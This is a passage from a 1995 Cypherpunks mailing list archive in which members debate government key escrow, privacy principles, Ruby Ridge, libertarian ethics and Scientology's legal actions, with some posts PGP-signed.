rarely is. Lots of chopper shots of Ruby Ridge. Lots of hand held camera recreations and interviews with the Weavers and the sniper (face obscured because he has something to hide), etc. But the most interesting thing that this emphasized for me was the sort of modern information warfare issues as highlighted in the recent Economist Survey. Info war is war by other means (a little shooting, communications, publicity, and litigation) and look what happened at Ruby Ridge. The Feds deployed 400 "troopies", some armored personnel carriers, copters, executive jets, Hummers, and other hardware. On the other side were 3 adults and 4 children with some 14 personal weapons. The result. One Fed and two Weavers dead. A $3.1 million legal settlement, and continuing problems for the Feds. That smells like a bad defeat to me. They couldn't even kill 7 people with a 57 to 1 force ratio. In addition, the operation and the various investigations must have cost the Feds millions more. (What *do* the Fibbies have to pay for those Ninja Hoods?) And they lost. That suggests that the ability of The Great Enemy to overcome the sort of directed human activity of the frictionless markets we are building will be quite limited. DCF "Your Honor, the Defense will rest without calling any witnesses. No witnesses we could put on the stand could do as good a job setting forth the Defense case as the Government's witnesses have already done." -- Gerry Spence at the conclusion of the Government's case in US vs. Weaver. From liberty at gate.net Thu Sep 7 08:39:14 1995 From: liberty at gate.net (Jim Ray) Date: Thu, 7 Sep 95 08:39:14 PDT Subject: ECPA (Was: University logging mail to anon.penet.fi) Message-ID: <199509071535.LAA49458@tequesta.gate.net> -----BEGIN PGP SIGNED MESSAGE----- "Josh M. Osborne" writes: >Even if we were in a more libertarian society you run the risk of >being boycotted by potential customers (of corse the analagy breaks >down somewhat, in a very libertarian society oyu might be able to >run a profatable ISP selling to the very nich market of people who >want to threten, harass, or generally make a nuicence of themselves). > As the list's designated "very libertarian" advocate, I must object. Here is what you must sign to become a member of the Libertarian Party: "I hereby certify that I do not believe in or advocate the initiation of force as a means of achieving political or social goals." Libertarian Pledge required for membership. ___________________________. To "to threten, harass, or generally make a nuicence"[SIC] of himself, one must violate this pledge, and there would no-doubt still be legal results. This points up the difference between libertaria (not utopia) and anarchy. Anything _DOESN'T_ go in libertaria. If you see a victim, there's almost certainly a crime, and if someone chose to threaten, harass, etc. me, I would want it so. Of course, there are exceptions. For example: If I join a mailing list which sometimes "harasses" me due to insufficient spell-checking/proof-reading of certain posts, there might still be the common-law defense that Jim Ray "came to the nuisance," and therefore I am still not due any compensation. I can always unsubscribe, and some people probably wish I would. ;) [NOTE: IANAL!] JMR -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Freedom isn't Freeh iQCVAwUBME8RWm1lp8bpvW01AQHXVgP9GsUelVcy4BFo/qt+Gm2JqdaHOlGUAvnP eFWXXT7hhzuC5Lz7vdBOb7itNGVahOVmDWPZxAbGJd/sJtd7YAfn4I8uMCiFieXZ dG7atBLLB66tBcsLYq/gXABHg2Z+MMojTf8A5XXCdqCJl4KoeaVckOEnKjR6uoCE Q9WrJiykH8Y= =xdDV -----END PGP SIGNATURE----- Regards, Jim Ray "As sensitive and broad-minded humans, we must never allow ourselves to be in any way judgmental of the religious practices of other people, even when these people clearly are raving space loons." -- Dave Barry ------------------------------------------------------------------------ PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 Key id. # E9BD6D35 James M. Ray ------------------------------------------------------------------------ Support Phil! email zldf at clark.net or see http://www.netresponse.com/zldf ________________________________________________________________________ From hallam at w3.org Thu Sep 7 08:50:22 1995 From: hallam at w3.org (hallam at w3.org) Date: Thu, 7 Sep 95 08:50:22 PDT Subject: ON OFF-TOPIC In-Reply-To: <199509070639.BAA00416@mail.socketis.net> Message-ID: <9509071545.AA05172@zorch.w3.org> > THE UNITED STATES "FEDERAL" GOVERNMENT HAS NO LEGITIMACY! Of course not, but I don't think that the 1776 result is up for review. This isn't about crypto nor about the social effects of crypto. Its just another looney conspiracy theory. Phill From bdavis at thepoint.net Thu Sep 7 08:55:48 1995 From: bdavis at thepoint.net (Brian Davis) Date: Thu, 7 Sep 95 08:55:48 PDT Subject: Zimmerman's statute In-Reply-To: Message-ID: On Fri, 1 Sep 1995, Alan Westrope wrote: > On Fri, 01 Sep 1995, Michael Froomkin wrote: > > > I think he would have to be charged first. Have I missed something? > > PS when does the statute of limitations run out? > > June '96. Zimmermann and Dubois appeared on a local talk radio show > recently; a friend happened to catch the program, taped it, and played > excerpts at a Cypherpunks meeting. This date was mentioned by Phil Dubois. I wouldn't be so sure. There are lots of "creative" ways to, in effect, extend the statute. My personal sense is that DOJ eventually wants to get this over with, so presumably would not attempt to be so "creative." The "usual" statute of limitations for federal crimes is 5 years, but conspiracy, RICO, bank fraud, tax offenses, and no doubt others that don't occur to me right now, muddy the 5 year statute. Bank fraud, for example, has a 10 year statute. EBD From bdavis at thepoint.net Thu Sep 7 08:56:12 1995 From: bdavis at thepoint.net (Brian Davis) Date: Thu, 7 Sep 95 08:56:12 PDT Subject: GAK In-Reply-To: Message-ID: On Fri, 1 Sep 1995, Timothy C. May wrote: > At 10:56 PM 9/1/95, Buford Terrell wrote: > > >If you've ever watched Not_at_all_Funny Home Videos or any of the > >American Urinal school of tabloid television, you soon start feeling > >that the real threat to privacy is not the guvmint, but all of > >the yoyos with their little cam corders running around pointing them > >at people. > > > >Security cameras in ATMS and at airline ticket counters do more > >to threaten you privacy than do FIBBIE wiretaps, and PGP won't > >protect you from them. (and usually neither will the courts). > > I absolutely agree with this, though this doesn't mean I'll stop worrying > about the government's plans for key escrow (GAK), about limits on key > lengths, or about other efforts to thwart strong security. I, of course, know of the "dislike" of GAK here. I am curious to know, however, if the "dislike" is because government would have access under any circumstances or if the primary worry is that government will cheat and get access when most would agree that they shouldn't (either by the judge "cheating" or a TLA stealing it). In other words ... if it took agreement by a review board composed of non-LEA members of this list, would the escrow be acceptable?? EBD From ghio at cmu.edu Thu Sep 7 08:59:59 1995 From: ghio at cmu.edu (Matthew Ghio) Date: Thu, 7 Sep 95 08:59:59 PDT Subject: Another Son of Clipper discussion paper In-Reply-To: Message-ID: Mike McNally (m5 at dev.tivoli.com) wrote: : Lucky Green writes: : > Windows 95 is on a lot of people's hard drives. It is therefore public : > and available for every one's inspection. How many people do you know : > that have reverse engineered Windows 95. How many of those use a : > reverse engineered version. I'd venture it is zero out of zero. : : Problems with this analogy: : : 1) Windows 95 is somewhat bigger than your typical encryption : routine; : : 2) The factor of motivation isn't considered. If one is motivated enough to want source code to their operating system, then they are motivated enough to dump Windows and download Linux or BSD. The only reason to reverse-engineer Windows 95 is to produce applications which are able to interoperate with Windows software in an unintended manner, and the only reason to want to do this (instead of writing a version for an open platform) is because Windows is standard on many PCs. The same applies to GAK. There is no reason to hack it when you can just use PGP instead. The only reason to hack it would be if it became a standard. If we have to start hacking GAK applications, we've already lost to a degree. Thus our focus should be on making alternatives available instead of just attacking GAK. (Although I suppose you could show how to hack it, for the sake of making a political statement.) From hallam at w3.org Thu Sep 7 09:10:00 1995 From: hallam at w3.org (hallam at w3.org) Date: Thu, 7 Sep 95 09:10:00 PDT Subject: Cybersecurity In-Reply-To: <199509071329.JAA06512@panix.com> Message-ID: <9509071605.AA05479@zorch.w3.org> >It was very much on the side of those seeking privacy, presenting >the government (even in the UK they are looking at mandatory key escrow, but >they haven't exactly told British subjects about it) as being underhand, >sneaking around to find ways of removing the privacy of the individual. The UK government looks at many things. Just because the US govt wants to do something daft and the UK wants to watch does not mean the UK wants to emulate it. The UK laabour party is opposed to key escrow "we do not accept the "clipper chip" argument". The Tories have less than half the level of popular support and are barely recognisable as a government. Phill From bdavis at thepoint.net Thu Sep 7 09:15:36 1995 From: bdavis at thepoint.net (Brian Davis) Date: Thu, 7 Sep 95 09:15:36 PDT Subject: NSA says Joe Sixpack won't buy crypto In-Reply-To: Message-ID: On Tue, 5 Sep 1995, Black Unicorn wrote: > On Mon, 4 Sep 1995, Jeff Simmons wrote: > > > > > Here's a prediction: within one year, we will see the advent of Micro$oft's > > "Not So Bad Privacy". It'll be a secret algorithm with either GAK done by > > Micro$oft itself, or a flat-out trap door. ANY communications with a > > Windoze box or network will have to use it, or loose the market. > > > It's here already. > It's called "lotus notes." > > > > About the > > same time, Justice will suddenly 'loose interest' in its various > > investigations of M$. Micro$oft will probably give it away for free as part > > of the Windows 95.702 upgrade. > > Wait a few months. Justice is boring of the investigation even now. I hope this doesn't mean the Department is switching to Microsoft Word! :-) (In fact, we're about to go to WP6.0 for Windows. And the 6.0 is not a typo.) > > -- > > Jeff Simmons jsimmons at goblin.punk.net EBD From frissell at panix.com Thu Sep 7 09:17:12 1995 From: frissell at panix.com (Duncan Frissell) Date: Thu, 7 Sep 95 09:17:12 PDT Subject: Collection of personal info Message-ID: <199509071616.MAA04473@panix.com> At 09:20 PM 9/6/95 -0500, Mac Norton wrote: >Well, scratch me deeply enough, I'm not sure I'd disagree >with Tim, "philosophically speaking." The problem is, as >all the truly wise philosophers recognized, we must live >in the world. And given the number of us who must do so, >that entails rules. That's what so nice about the nets. You don't (won't) have to "live in the world" any more. The creation of consentual halucinations (virtual worlds) allows you to "change the world" at will. And once the interface improves... Actually, the creation of separate "spaces" that can only be entered with your (each person's) permission will have a big impact on life in the real world. DCF "If you don't want TRW to know what you're doing, lie." From mark at lenox.com Thu Sep 7 09:31:21 1995 From: mark at lenox.com (Mark Contois) Date: Thu, 7 Sep 95 09:31:21 PDT Subject: GAK In-Reply-To: Message-ID: <199509071628.MAA07681@tempest.lenox.com> > In other words ... if it took agreement by a review board composed of > non-LEA members of this list, would the escrow be acceptable?? > > EBD Speaking for myself only, of course, mandatory key escrow under *any* circumstances is a Bad Thing. I don't want anyone to have my secret key/passphrase, even if 'anyone' consists of n respected cypherpunks. (How are we supposed to tell whether they're LE, anyway? I possess a high degree of confidence, for example, that Tim May is not an undercover spook. But that doesn't stop various tentacles^H^H^H^H^H^H^H^H^H anonymous posters from expressing assertions to the contrary.) If I *give* my key to an escrow agent, of course, that's a different story. ("Mr. Cheatem, in the event of my death or disappearance, please decrypt this file with the enclosed key and fax it to the Washington Post.") But I certainly don't want to allow my key to reside with an agent who could be forced to turn it over on the basis of a court order. Sorry if I'm repeating an earlier discussion. Mark -- Mark Contois * The Lenox Group * Boston, MA * http://www.lenox.com/~mark/ Finger for PGP public key * Stellar Crisis: http://www.lenox.com/games/sc Cypherpunks: Share and deploy ********* NSA: Go stick your head in a pig. From perry at piermont.com Thu Sep 7 09:34:06 1995 From: perry at piermont.com (Perry E. Metzger) Date: Thu, 7 Sep 95 09:34:06 PDT Subject: not a flame please read and think about this In-Reply-To: Message-ID: <199509071633.MAA04493@frankenstein.piermont.com> Sandy Sandfort writes: > On Thu, 7 Sep 1995 an116512 at anon.penet.fi wrote: > > > why is it that half the people who post here work for the > > government or big companies that are doing governments bidding > > (rand.org (which is part of the the nsa!) att.com (makers of the > > clipper chip) mit (which onwns rsa) netscape etc etc) > > I doubt the statistics and I don't see how mere employment with > the above somehow disqualifies one for having a regard for > privacy. anonymous idiot doesn't even have his facts right. VLSI and Mykotronix (sp?) make the EES chips. Rand doesn't do much NSA research (although there are other companies that do) and MIT doesn't have any real rights to RSA given the PKP agreements. In any case, who gives a damn? Perry From zinc at zifi.genetics.utah.edu Thu Sep 7 09:49:06 1995 From: zinc at zifi.genetics.utah.edu (zinc) Date: Thu, 7 Sep 95 09:49:06 PDT Subject: Scientology and police visit XS4ALL Amsterdam In-Reply-To: <9509071507.AA08037@cantina.verity.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Thu, 7 Sep 1995, Patrick Horgan wrote: > Date: Thu, 7 Sep 1995 08:07:39 -0700 > From: Patrick Horgan > To: cg at bofh.lake.de, mark at lochard.com.au > Cc: cypherpunks at toad.com > Subject: Re: Scientology and police visit XS4ALL Amsterdam > > > My personal view is co$ deserves all the flak they get. > > I know who you're referring to by saying co$, but what do co$ mean? > Co-DollarSign? Co-Dollar? > CO$ is _C_hurch _O_f _$_cientology L. Ronboy the telepath Hubbards biggest joke. - -pjf -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBME8hqE3Qo/lG0AH5AQGFkAQAikXaF7nCJ99+XBONXKcvBTO7lMZn+wEZ l9+YZOI6QLZNY/f/HB5mOorwn340lgED0y/RjoT9ctoXwVW9bNSZZ68lQm7k72wO Ymz1NxHfwQRq8FNiUZnKmz+Wb/YHpAwGhvvPfocA+rLupdd9x/9BSm047RDgwgvX MVEx4B5C8wI= =ot1t -----END PGP SIGNATURE----- From tcmay at got.net Thu Sep 7 10:10:01 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 7 Sep 95 10:10:01 PDT Subject: Why Key Escrow (GAK) is So Bad Message-ID: At 1:25 AM 9/4/95, Brian Davis wrote: >On Fri, 1 Sep 1995, Timothy C. May wrote: >> I absolutely agree with this, though this doesn't mean I'll stop worrying >> about the government's plans for key escrow (GAK), about limits on key >> lengths, or about other efforts to thwart strong security. > >I, of course, know of the "dislike" of GAK here. I am curious to know, >however, if the "dislike" is because government would have access under >any circumstances or if the primary worry is that government will cheat >and get access when most would agree that they shouldn't (either by the >judge "cheating" or a TLA stealing it). > >In other words ... if it took agreement by a review board composed of >non-LEA members of this list, would the escrow be acceptable?? [I'm addressing the basic issue of key escrow, or what Carl Ellison calls "GAK" (Government Access to Keys), not the current debate in D.C. about using some form of key escrow for exportable crypto. The debate on key escrow is really about the crypto citizens will use, not what will be allowed to be exported.] Speaking for myself--though I think this captures the feelings of many--my objection to GAK is on *principle*: * No government can tell me what language I must communicate in and what language I must _not_ communicate in. David Sternlight has characterized this position as "childish," as the whinings of spoiled children who don't want to be told what to do. If so, then Thomas Jefferson was surely the biggest child of all, as he and his compatriots developed and used secret codes for communications. No doubt King George would have found GAK quite useful. No, the point is really about whether people may speak and write in the languages they wish, or be ordered to speak and write in ways the government can monitor, with or without the "speed bump" of key escrow and court orders to release the escrowed keys. (Ironically, I just heard about a case in Texas where a judge ordered a mother to stop speaking in Spanish to her child at home, calling it "child abuse." The implications of this are self-evident.) "Escrow" of communications keys, when commanded by the government, is no different than requiring that all locks have duplicate keys "escrowed" with the police, or that all curtains and window shades have a special "invisibility mode" that "law enforcement" can enable under certain circumstances. "Key escrow," or GAK, is to most of us equivalent to universal wiretapping. Why not tape-record all calls and "escrow" the result?. Why not mount surveillance cameras in homes and "escrow" the result? All are essentially equivalent. The pernicious nature of the "escrow" idea, which I have to admit is a new twist on the surveillance state that was not anticipated by Orwell, Brunner, or any of the other writers on this topic, is that it says that surveillance is not so bad after all, because the results of the escrow will not be looked at except when "justified." By whom? And by what conceivable right can the government tell me I may not use the communication system and language of my choice? I have no doubt that such key escrow, or recording of all calls, or surveillance cameras, with escrowed results, would "stop" some crimes. Maybe even some serious crimes, even horrific crimes. So what? In a free society, we don't tell people what language they may speak in, and with whom, nor did we place microphones and cameras in their presence, even if we "escrow" the results and promise not to look unless a judge or a review panel says it's OK. There are undoubtedly crimes that would be stopped if surveillance cameras were placed in many places, private and public, with "video escrow." Friends of mine are developing micropower, tiny, ultrawideband radio "localizers," that could be used by parents to keep track of children, pets, luggage, etc. I have long joked with them about "position escrow," where the government will mandate that all citizen-units wear these devices (or have them implanted) so that their positions can be monitored. Would an "escrow" system make it any less unacceptable? The arguments for "position escrow," once the technology becomes available (surely by 1998-9) are very similar to those being made for communications escrow. Lots of crimes would be solved, and even OJ might be convicted, if a court could order the "position escrow" files opened. So what? That's now what a free society is about. The basic principle is the issue. There are other problems with key escrow, involving such things as how persistent the access keys will be (will a court order reveal past communications not covered by the order?), who will have access, etc. These are the things the government _wants_ us to focus on, as these can probably be fixed by sufficiently elaborate protocols...sort of. But the core issue is not being addressed, the core issue of surveillance and the government's plan to order us to speak only in certain approved modes. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From tcmay at got.net Thu Sep 7 10:22:39 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 7 Sep 95 10:22:39 PDT Subject: Crypto Anarchy and Virtual Communities Message-ID: At 4:15 PM 9/7/95, Duncan Frissell wrote: >At 09:20 PM 9/6/95 -0500, Mac Norton wrote: >>Well, scratch me deeply enough, I'm not sure I'd disagree >>with Tim, "philosophically speaking." The problem is, as >>all the truly wise philosophers recognized, we must live >>in the world. And given the number of us who must do so, >>that entails rules. > >That's what so nice about the nets. You don't (won't) have to "live in the >world" any more. The creation of consentual halucinations (virtual worlds) >allows you to "change the world" at will. > >And once the interface improves... > >Actually, the creation of separate "spaces" that can only be entered with >your (each person's) permission will have a big impact on life in the real >world. I of course agree strongly with Duncan. We don't often talk about this aspect, as it was all hashed-over a couple of years ago, and most newcomers to the list do not seem as interested as we were. (And, it has little to do with coding in C :-}) Those interested might want to look at the very long chapter on "Crypto Anarchy" in my Cyphernomicon, or my paper, "Crypto Anarchy and Virtual Communities." Or read "True Names" and "Snow Crash" and think about what happens when the stuff we talk about is added. (Hint: Hiro Protagonist would not be "vastly wealthy" in the Metaverse but poor in the Real World (tm).) --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From iang at cory.EECS.Berkeley.EDU Thu Sep 7 10:24:15 1995 From: iang at cory.EECS.Berkeley.EDU (Ian Goldberg) Date: Thu, 7 Sep 95 10:24:15 PDT Subject: How to get to Saturday's meeting in SF? Message-ID: <199509071724.KAA00396@cory.EECS.Berkeley.EDU> I'd like to go to the meeting on Saturday in SF, but I need instructions on how to get there by public transit from the Berkeley campus. (Alternatively, is anyone going that may be able to give me a lift?) Thanks, - Ian From hkhenson at shell.portal.com Thu Sep 7 10:25:07 1995 From: hkhenson at shell.portal.com (H Keith Henson) Date: Thu, 7 Sep 95 10:25:07 PDT Subject: PGP key disclosure Message-ID: <199509071723.KAA02608@jobe.shell.portal.com> [included msg] i've been told that larry wollersheim refuses to give up his de-encryption key to Co$, and will go to jail before he does. this is ok to post. i can't post yet, due to technology transfer happening here at the usf.edu --------------------------------------m. council, human being Hell, if you understood everything I say, you'd council at luna.cas.usf.edu be me. -Miles Davis [end included msg] I am off cypherpunks at the moment, so if there are any followups to this, please send me email. Thanks, Keith Henson From tedwards at src.umd.edu Thu Sep 7 10:27:48 1995 From: tedwards at src.umd.edu (Thomas Grant Edwards) Date: Thu, 7 Sep 95 10:27:48 PDT Subject: ECPA (Was: University logging mail to anon.penet.fi) In-Reply-To: <199509071535.LAA49458@tequesta.gate.net> Message-ID: On Thu, 7 Sep 1995, Jim Ray wrote: > >Even if we were in a more libertarian society you run the risk of > >being boycotted by potential customers (of corse the analagy breaks > >down somewhat, in a very libertarian society oyu might be able to > >run a profatable ISP selling to the very nich market of people who > >want to threten, harass, or generally make a nuicence of themselves). > To "to threten, harass, or generally make a nuicence"[SIC] of himself, > one must violate this pledge, and there would no-doubt still be legal > results. Clearly threats of violence are not considered legal by most libertarians, including the Libertarian Party of the US. Furthermore, there is no reason why an ISP has to connect to another ISP. ISPs that do more harm than good may not be invitied to participate in major switiching centers. -Thomas From duncan at hasp.com Thu Sep 7 10:29:21 1995 From: duncan at hasp.com (Duncan J Watson) Date: Thu, 7 Sep 95 10:29:21 PDT Subject: GAK In-Reply-To: Message-ID: <9509071332.ZM124@titan.hasp.com> Brian, Your question is very hard to answer as poised. How is access granted? To whom? In what period of time?, etc. The details are very important here as this is a very detail-oriented list. Also the details of implementation are where you may find the objections. Many plans sound grand when loosely described but fail due to small details. My personal belief is that any mandatory key escrow system will be open to abuse by authority figures. A solidly implemented key escrow service operated by smart privacy oriented private firms would have benifit corperations and others engaged in cooperative development or other cooperative operations. Key escrow would keep the accountants and lawyers happy. Just my $0.02. djw On Sep 3, 9:25pm, Brian Davis wrote: > Subject: Re: GAK [stuff deleted] > I, of course, know of the "dislike" of GAK here. I am curious to know, > however, if the "dislike" is because government would have access under > any circumstances or if the primary worry is that government will cheat > and get access when most would agree that they shouldn't (either by the > judge "cheating" or a TLA stealing it). > > In other words ... if it took agreement by a review board composed of > non-LEA members of this list, would the escrow be acceptable?? > > EBD > >-- End of excerpt from Brian Davis -- Duncan J Watson Email:Duncan at hasp.com Tech Support Manager/Sys Admin Ph#: +1 212 564 5678 Aladdin Software Security Inc Fax#: +1 212 564 3377 :::finger Duncan at hasp.com for PGP key::: http://www.aks.com/ From tcmay at got.net Thu Sep 7 10:34:48 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 7 Sep 95 10:34:48 PDT Subject: Why Key Escrow (GAK) is So Bad Message-ID: I wrote: .... made for communications escrow. Lots of crimes would be solved, and even OJ might be convicted, if a court could order the "position escrow" files opened. So what? That's now what a free society is about. .... This last line has a typo. What I meant to say was: "That's not what a free society is about." Normally I don't post minor corrections, but this one needs correcting. --Tim ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From tcmay at got.net Thu Sep 7 10:55:19 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 7 Sep 95 10:55:19 PDT Subject: GAK Hacks Message-ID: At 3:43 PM 9/7/95, Matthew Ghio wrote: >The same applies to GAK. There is no reason to hack it when you can just >use PGP instead. The only reason to hack it would be if it became a >standard. If we have to start hacking GAK applications, we've already >lost to a degree. Thus our focus should be on making alternatives >available instead of just attacking GAK. (Although I suppose you could >show how to hack it, for the sake of making a political statement.) GAK Hacks! We did it for SSL, let's do it for GAK. Demonstrate that superencryption (encrypting within a GAK wrapper) defeats GAK. And other kinds of hacks, including releasing "damaged" (inoperative) versions of the proposed code (when it becomes available). Or releasing "work-alikes." Etc. Granted, the demonstrations will be less clear than breaking the 40-bit key was, partly because there is no clear-cut standard out there, and many aspects of GAK are still in flux. But it could still be a powerful example, an example "by direct demonstration," that government-mandated key escrow is problematic. (Of course, a sufficiently powerful or clear demonstration, picked up by the popular press the way the SSL challenge was, could also cause the government to tighten up the rules on GAK, such as--speculatively!!!!--adding "compliance audits" to the GAK laws.) But GAK Hacking could be an interesting project. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From pjm at ionia.engr.sgi.com Thu Sep 7 11:05:49 1995 From: pjm at ionia.engr.sgi.com (Patrick May) Date: Thu, 7 Sep 95 11:05:49 PDT Subject: GAK In-Reply-To: Message-ID: <199509071805.LAA12805@ionia.engr.sgi.com> -----BEGIN PGP SIGNED MESSAGE----- Brian Davis writes: > I, of course, know of the "dislike" of GAK here. I am curious to know, > however, if the "dislike" is because government would have access under > any circumstances or if the primary worry is that government will cheat > and get access when most would agree that they shouldn't (either by the > judge "cheating" or a TLA stealing it). Since you're sure to get a number of long responses to this question, I'll keep mine short. I don't want to give anyone my keys. I do not harm anyone by refusing to do so. Therefore, anyone using force to take my keys is acting immorally.* > In other words ... if it took agreement by a review board composed of > non-LEA members of this list, would the escrow be acceptable?? No. I don't choose to give Louis Freeh my keys. I don't choose to give Brian Davis my keys. I don't choose to give Tim May my keys. Any use of force to compel me to yield my keys is unacceptable. Regards, Patrick May * Insert standard Objectivist and Libertarian arguments regarding morality, government, and force here. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBME80YO5Yg08fDKehAQEoqAP/QWcvU4xu4qQNw7S6RNPQ+zCmGzh+B/7r G/490EMOKifsraaDYmh0WRBJ7+2rr+sWuvwpnJzVhRPcR1Mhzz/ZbNjrIm5wFhDH /Yrkln3oZ8iIKgvvwrw75krBG511CHvHg0OudYsxuuP10pgQaT59uQF0bod1plY0 zpao6in3ZKI= =QxbQ -----END PGP SIGNATURE----- From pjm at ionia.engr.sgi.com Thu Sep 7 11:05:58 1995 From: pjm at ionia.engr.sgi.com (Patrick May) Date: Thu, 7 Sep 95 11:05:58 PDT Subject: GAK In-Reply-To: Message-ID: <199509071805.LAA12656@ionia.engr.sgi.com> Brian Davis writes: > I, of course, know of the "dislike" of GAK here. I am curious to know, > however, if the "dislike" is because government would have access under > any circumstances or if the primary worry is that government will cheat > and get access when most would agree that they shouldn't (either by the > judge "cheating" or a TLA stealing it). Since you're sure to get a number of long responses to this question, I'll keep mine short. I don't want to give anyone my keys. I do not harm anyone by refusing to do so. Therefore, anyone using force to take my keys is acting immorally.* > In other words ... if it took agreement by a review board composed of > non-LEA members of this list, would the escrow be acceptable?? No. I don't choose to give Louis Freeh my keys. I don't choose to give Brian Davis my keys. I don't choose to give Tim May my keys. Any use of force to compel me to yield my keys is unacceptable. Regards, Patrick May * Insert standard Objectivist and Libertarian arguments regarding morality, government, and force here. From dmandl at panix.com Thu Sep 7 11:46:16 1995 From: dmandl at panix.com (dmandl at panix.com) Date: Thu, 7 Sep 95 11:46:16 PDT Subject: Collection of personal info In-Reply-To: <199509071616.MAA04473@panix.com> Message-ID: On Thu, 7 Sep 1995, Duncan Frissell wrote: > That's what so nice about the nets. You don't (won't) have to "live in the > world" any more. The creation of consentual halucinations (virtual worlds) > allows you to "change the world" at will. Goody. In this virtual world, we can also abolish all taxes, remove all restrictions on crypto use, or even get rid of the government altogether. I just hope I can find enough food there. > And once the interface improves... ...I won't have to deal with the inefficiencies of real sex, live music performances, or (non-virtual) world travel ever again. > Actually, the creation of separate "spaces" that can only be entered with > your (each person's) permission will have a big impact on life in the real > world. Yeah, it'll wipe it out. I've got to tell you, Duncan, this kind of rhetoric pushes me over to the luddite side more every day. No flame intended--just one man's opinion. --Dave. -- Dave Mandl dmandl at panix.com http://wfmu.org/~davem From tomservo at access.digex.net Thu Sep 7 11:48:09 1995 From: tomservo at access.digex.net (Scott Fabbri) Date: Thu, 7 Sep 95 11:48:09 PDT Subject: Force Ratios Message-ID: <199509071847.OAA08292@access5.digex.net> -----BEGIN PGP SIGNED MESSAGE----- > But the most interesting thing that this emphasized for me was the sort of > modern information warfare issues as highlighted in the recent Economist > Survey. Info war is war by other means (a little shooting, communications, > publicity, and litigation) and look what happened at Ruby Ridge. The Feds > deployed 400 "troopies", some armored personnel carriers, copters, executive > jets, Hummers, and other hardware. On the other side were 3 adults and 4 > children with some 14 personal weapons. > > The result. One Fed and two Weavers dead. A $3.1 million legal settlement, > and continuing problems for the Feds. That smells like a bad defeat to me. > They couldn't even kill 7 people with a 57 to 1 force ratio. Well. I think if killing the Weaver clan was the primary objective, they could have been much more direct. One plane, one bomb/missile, one pilot, with a 1:7 force ratio (1:2 if you don't count probable noncombatants). Or a SEAL team with tools to make it look like an "accident" (carbon monoxide, maybe? A propane explosion?). However, we generally frown on that kind of thing in our polite society. :-) If the Feds had really wanted to kill the Weavers, it'd probably be called "Ruby Crater" now. > In addition, the operation and the various investigations must have cost the > Feds millions more. (What *do* the Fibbies have to pay for those Ninja > Hoods?) And they lost. Murphy's Law applies everywhere. Most likely they really wanted to take Weaver and clan alive (and thought they could!), and the worst possible things happened. (Surprisingly enough, government TLAs know all about the concept of "bad press," and killing bystanders isn't SOP.) > That suggests that the ability of The Great Enemy to overcome the sort of > directed human activity of the frictionless markets we are building will be > quite limited. But they don't have to face you directly, just convince someone who allegedly represents you that a "law" is necessary to "save you from yourself" and to "keep our great country free and safe." Then you either play ball, or you wind up with a bunch of balaclava-clad guys in your bedroom one night, taking your computer and dragging you off. Maybe they don't get anything to convict you, but you still have to mount a costly defense. What a great system, eh? Just like the Founding Fathers imagined. - -- Scott Fabbri MSTie #31643 tomservo at access.digex.net "If I knew that a man was coming to my house with the conscious design of doing me good, I should run for my life." --Thoreau -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface iQB1AwUBME898OvEnOI8TfM9AQFLJQL9GV7+YWfPUtBKaF7qbny4KLz7DhxkSrEE TIhCVRiDmuoSnqsUFpM4i4yDQqEJK5lOnxm7mwYyPrKku8Z1JB7SPG5Koq/Vt/QZ UwOnYT0VRNydJVQpIWq7AgnBmIz2wRYe =uMqt -----END PGP SIGNATURE----- From jlasser at rwd.goucher.edu Thu Sep 7 12:12:59 1995 From: jlasser at rwd.goucher.edu (Jon Lasser) Date: Thu, 7 Sep 95 12:12:59 PDT Subject: GAK In-Reply-To: Message-ID: On Sun, 3 Sep 1995, Brian Davis wrote: > I, of course, know of the "dislike" of GAK here. I am curious to know, > however, if the "dislike" is because government would have access under > any circumstances or if the primary worry is that government will cheat > and get access when most would agree that they shouldn't (either by the > judge "cheating" or a TLA stealing it). ...or "somebody else" (ie commercial competitor, personal or political rival, etc) paying off somebody to obtain it. I don't trust the gvm't to only get access when they should, either. > In other words ... if it took agreement by a review board composed of > non-LEA members of this list, would the escrow be acceptable?? Not necessarily; the members of the review board can be bribed, blackmailed, lied to, etc. I don't believe there's a competent review board available...nor do I think such a thing could be created. Jon ------------------------------------------------------------------------------ Jon Lasser (410)494-3072 Visit my home page at http://www.goucher.edu/~jlasser/ You have a friend at the NSA: Big Brother is watching. Finger for PGP key. From rah at shipwright.com Thu Sep 7 12:24:56 1995 From: rah at shipwright.com (Robert Hettinga) Date: Thu, 7 Sep 95 12:24:56 PDT Subject: Industry Slams Gov's Encryption Export Plan Message-ID: --- begin forwarded text Mime-Version: 1.0 Date: Thu, 07 Sep 1995 07:15:48 From: James Rapp To: www-buyinfo at allegra.att.com, rpournel at 